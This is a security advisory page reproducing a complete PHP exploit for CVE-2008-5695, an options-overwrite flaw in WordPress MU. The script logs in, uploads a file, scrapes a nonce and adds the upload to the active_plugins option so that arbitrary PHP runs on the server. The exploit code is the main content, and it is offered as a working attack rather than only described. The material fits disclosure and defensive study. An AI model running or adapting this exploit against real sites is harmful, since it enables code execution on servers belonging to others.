|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 4798 CVE : CVE-2008-5695 CWE : CWE-20 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes Credit : Alexander Concha Published : 23.12.2008
Advisory Content : <?php /* WordPress [MU] blog's options overwrite Credits : Alexander Concha <alex at buayacorp dot com> Website : http://www.buayacorp.com/ Advisory: http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.htm l This exploit uses active_plugins option to execute arbitrary PHP */ include_once './class-snoopy.php'; // Fix Snoopy class SnoopyExt extends Snoopy { function _prepare_post_body($formvars, $formfiles) { if ( is_string($formvars) ) { return $formvars; } return parent::_prepare_post_body($formvars, $formfiles); } } set_time_limit( 0 ); // Any user with 'manage_options' and 'upload_files' capabilities $user = 'user'; $pass = '1234'; $blog_url = 'http://localhost.localdomain/mu/'; $remote_file = ''; // relative path to wp-content $local_file = ''; // the contents of this file, if any, will be uploaded $snoopy = new SnoopyExt(); $snoopy->maxredirs = 0; $snoopy->cookies['wordpress_test_cookie'] = 'WP+Cookie+check'; $snoopy->submit("{$blog_url}wp-login.php", array('log' => $user, 'pwd' => $pass)); $snoopy->setcookies(); // Set auth cookies for future requests if ( empty($remote_file) ) { // Upload a new file $snoopy->_submit_type = 'image/gif'; $snoopy->submit("{$blog_url}wp-app.php?action=/attachments", get_contents()); if ( preg_match('#<id>([^<]+)</id>#i', $snoopy->results, $match) ) { $remote_file = basename($match[1]); } } if ( empty($remote_file) ) die('Exploit failed...'); // Look for real path $snoopy->fetch("{$blog_url}wp-admin/export.php?download"); if ( preg_match("#<wp:meta_value>(.*$remote_file)</wp:meta_value>#", $snoopy->results, $match) ) { $remote_file = preg_replace('#.*?wp-content#', '', $match[1]); } if ( empty($remote_file) ) die('Exploit failed...'); // It asumes that file uploads are stored within wp-content $remote_file = '../' . ltrim($remote_file, '/'); $snoopy->fetch("{$blog_url}wp-admin/plugins.php"); // Recover previous active plugins $active_plugins = array(); if ( preg_match_all('#action=deactivate&([^\']+)#', $snoopy->results, $matches) ) { foreach ($matches[0] as $plugin) { if ( preg_match('#plugin=([^&]+)#', $plugin, $match) ) $active_plugins[] = urldecode($match[1]); } print_r($active_plugins); } $active_plugins[] = $remote_file; // Fetch a valid nonce $snoopy->fetch("{$blog_url}wp-admin/options-general.php"); if ( preg_match('#name=._wpnonce. value=.([a-z\d]{10}).#', $snoopy->results, $match) ) { // Finally update active_plugins $snoopy->set_submit_normal(); $snoopy->submit("{$blog_url}wp-admin/options.php", array( 'active_plugins' => $active_plugins, '_wpnonce' => $match[1], 'action' => 'update', 'page_options' => 'active_plugins', )); } function get_contents() { global $local_file; return file_exists($local_file) ? file_get_contents($local_file) : '<?php echo "Hello World " . __FILE__; ?>'; } ?> References : http://www.milw0rm.com/exploits/5066
http://www.buayacorp.com/files/wordpress/wp-blog-option-overwrite.txt
http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html
http://secunia.com/advisories/28789
http://mu.wordpress.org/forums/topic.php?id=7534&page&replies=1  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |